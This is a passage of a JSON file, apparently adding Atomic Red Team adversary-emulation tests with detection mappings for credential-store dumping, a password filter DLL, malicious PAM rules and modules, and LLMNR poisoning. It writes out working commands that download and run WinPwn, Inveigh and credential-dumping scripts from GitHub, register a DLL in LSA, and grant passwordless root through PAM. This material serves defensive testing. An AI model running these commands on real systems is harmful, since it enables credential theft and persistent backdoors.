net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nlazagnemodule -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds -consoleoutput -noninteractive ", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer -consoleoutput -noninteractive " + ], + "commands": [ + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1555\\src\\T1555-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force \n", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force\n", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "vaultcmd /listcreds:\"Windows Credentials\" /all\n", + "source": 
"atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "vaultcmd /listcreds:\"Web Credentials\" /all\n", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nlazagnemodule -consoleoutput -noninteractive", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds -consoleoutput -noninteractive ", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer -consoleoutput -noninteractive ", + "source": "atomics/T1555/T1555.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1555", + "display_name": "Credentials from Password Stores", + "atomic_tests": [ + { + "name": "Extract Windows Credential Manager via VBA", + "auto_generated_guid": "234f9b7c-b53d-4f32-897b-b880a6c9ea7b", + "description": "This module will extract the credentials found within the Windows credential manager and dump\nthem to $env:TEMP\\windows-credentials.txt\n", + "supported_platforms": [ + "windows" + ], + 
"dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft Word must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"word.Application\" | Out-Null\n $process = \"winword\"\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1555\\src\\T1555-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "cleanup_command": "Remove-Item \"$env:TEMP\\windows-credentials.txt\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]", + "auto_generated_guid": "c89becbe-1758-4e7d-a0f4-97d2188a23e3", + "description": "This module will extract the credentials from Windows Credential Manager", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force \n" + } + }, + { + "name": "Dump credentials from Windows Credential Manager With PowerShell [web Credentials]", + "auto_generated_guid": "8fd5a296-6772-4766-9991-ff4e92af7240", + "description": "This module will extract the credentials from Windows Credential Manager", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "IEX (IWR 
'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force\n" + } + }, + { + "name": "Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]", + "auto_generated_guid": "36753ded-e5c4-4eb5-bc3c-e8fba236878d", + "description": "This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "vaultcmd /listcreds:\"Windows Credentials\" /all\n" + } + }, + { + "name": "Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]", + "auto_generated_guid": "bc071188-459f-44d5-901a-f8f2625b2d2e", + "description": "This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "vaultcmd /listcreds:\"Web Credentials\" /all\n" + } + }, + { + "name": "WinPwn - Loot local Credentials - lazagne", + "auto_generated_guid": "079ee2e9-6f16-47ca-a635-14efcd994118", + "description": "The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. \nEach software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). 
\nThis tool has been developed for the purpose of finding these passwords for the most commonly-used software", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nlazagnemodule -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - Wifi Credentials", + "auto_generated_guid": "afe369c2-b42e-447f-98a3-fb1f4e2b8552", + "description": "Loot local Credentials - Wifi Credentials technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds -consoleoutput -noninteractive ", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords", + "auto_generated_guid": "db965264-3117-4bad-b7b7-2523b7856b92", + "description": "Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer -consoleoutput -noninteractive ", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + 
"relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": 
"T1556.002", + "command_list": [ + "$passwordFilterName = (Copy-Item \"PathToAtomicsFolder\\T1556.002\\src\\AtomicPasswordFilter.dll\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\nRestart-Computer -Confirm\n" + ], + "commands": [ + { + "command": "$passwordFilterName = (Copy-Item \"PathToAtomicsFolder\\T1556.002\\src\\AtomicPasswordFilter.dll\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\nRestart-Computer -Confirm\n", + "source": "atomics/T1556.002/T1556.002.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Password Filter DLL" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1556.002", + "display_name": "Modify Authentication Process: Password Filter DLL", + "atomic_tests": [ + { + "name": "Install and Register Password Filter DLL", + "auto_generated_guid": "a7961770-beb5-4134-9674-83d7e1fa865c", + "description": "Uses PowerShell to install and register a password filter DLL. 
Requires a reboot and administrative privileges.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_dll": { + "description": "Path to DLL to be installed and registered", + "type": "Path", + "default": "PathToAtomicsFolder\\T1556.002\\src\\AtomicPasswordFilter.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll})\n", + "prereq_command": "if (Test-Path #{input_dll}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own password filter dll\"\n" + } + ], + "executor": { + "command": "$passwordFilterName = (Copy-Item \"#{input_dll}\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\nRestart-Computer -Confirm\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows 
registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1556.003", + "command_list": [ + "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" /etc/pam.d/su-l\n", + "sudo sed -i \"#{index}s,^,auth sufficient pam_succeed_if.so uid >= 0\\n,g\" #{path_to_pam_conf}\n", + null, + "sudo sed -i \"#{index}s,^,auth sufficient /tmp/pam_evil.so\\n,g\" #{path_to_pam_conf}\n", + "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" #{path_to_pam_conf}\n" + ], + "commands": 
[ + { + "command": "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" /etc/pam.d/su-l\n", + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + }, + { + "command": "sudo sed -i \"#{index}s,^,auth sufficient pam_succeed_if.so uid >= 0\\n,g\" #{path_to_pam_conf}\n", + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + }, + { + "command": null, + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + }, + { + "command": "sudo sed -i \"#{index}s,^,auth sufficient /tmp/pam_evil.so\\n,g\" #{path_to_pam_conf}\n", + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + }, + { + "command": "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" #{path_to_pam_conf}\n", + "source": "atomics/T1556.003/T1556.003.yaml", + "name": "Atomic Red Team Test - Modify Authentication Process: Pluggable Authentication Modules" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1556.003", + "display_name": "Modify Authentication Process: Pluggable Authentication Modules", + "atomic_tests": [ + { + "name": "Malicious PAM rule", + "auto_generated_guid": "4b9dde80-ae22-44b1-a82a-644bf009eb9c", + "description": "Inserts a rule into a PAM config and then tests it.\n\nUpon successful execution, this test will insert a rule that allows every user to su to root without a password.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_pam_conf": { + "description": "PAM config file to modify.", + "type": "String", + "default": "/etc/pam.d/su-l" + }, + "pam_rule": { + "description": "Rule to add to the PAM config.", + "type": "String", + "default": "auth sufficient pam_succeed_if.so uid >= 0" + }, + "index": { + 
"description": "Index where the rule is inserted.", + "type": "Integer", + "default": 1 + } + }, + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" #{path_to_pam_conf}\n", + "cleanup_command": "sudo sed -i \"\\,#{pam_rule},d\" #{path_to_pam_conf}\n" + } + }, + { + "name": "Malicious PAM module", + "auto_generated_guid": "65208808-3125-4a2e-8389-a0a00e9ab326", + "description": "Creates a PAM module, inserts a rule to use it, and then tests it.\n\nUpon successful execution, this test will create a PAM module that allows every user to su to root without a password.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_pam_conf": { + "description": "PAM config file to modify.", + "type": "String", + "default": "/etc/pam.d/su-l" + }, + "pam_rule": { + "description": "Rule to add to the PAM config.", + "type": "String", + "default": "auth sufficient /tmp/pam_evil.so" + }, + "index": { + "description": "Index where the rule is inserted.", + "type": "Integer", + "default": 1 + }, + "path_to_pam_module_source": { + "description": "Path to PAM module source code.", + "type": "Path", + "default": "PathToAtomicsFolder/T1556.003/src/pam_evil.c" + }, + "path_to_pam_module": { + "description": "Path to PAM module object", + "type": "Path", + "default": "/tmp/pam_evil.so" + } + }, + "dependencies": [ + { + "description": "The PAM development library must be installed to build the PAM module\n", + "prereq_command": "if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ -n \"`which apt-get`\" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n \"`which yum`\" ]; then sudo yum -y install pam-devel; fi\n" + }, + { + "description": "The PAM module must exist on disk at specified location (#{path_to_pam_module})\n", + "prereq_command": "if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo 
gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i \"#{index}s,^,#{pam_rule}\\n,g\" #{path_to_pam_conf}\n", + "cleanup_command": "sudo sed -i \"\\,#{pam_rule},d\" #{path_to_pam_conf}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in 
order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1557.001", + "command_list": [ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1\" -UseBasicParsing)\nInvoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y" + ], + "commands": [ + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1\" -UseBasicParsing)\nInvoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y", + "source": "atomics/T1557.001/T1557.001.yaml", + "name": "Atomic Red Team Test - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1557.001", + "display_name": "Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay", + "atomic_tests": [ + { + "name": "LLMNR Poisoning with Inveigh (PowerShell)", + 
"auto_generated_guid": "deecd55f-afe0-4a62-9fba-4d1ba2deb321", + "description": "Inveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific listeners/sockets. This Atomic will run continuously until you cancel it or it times out.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1\" -UseBasicParsing)\nInvoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + 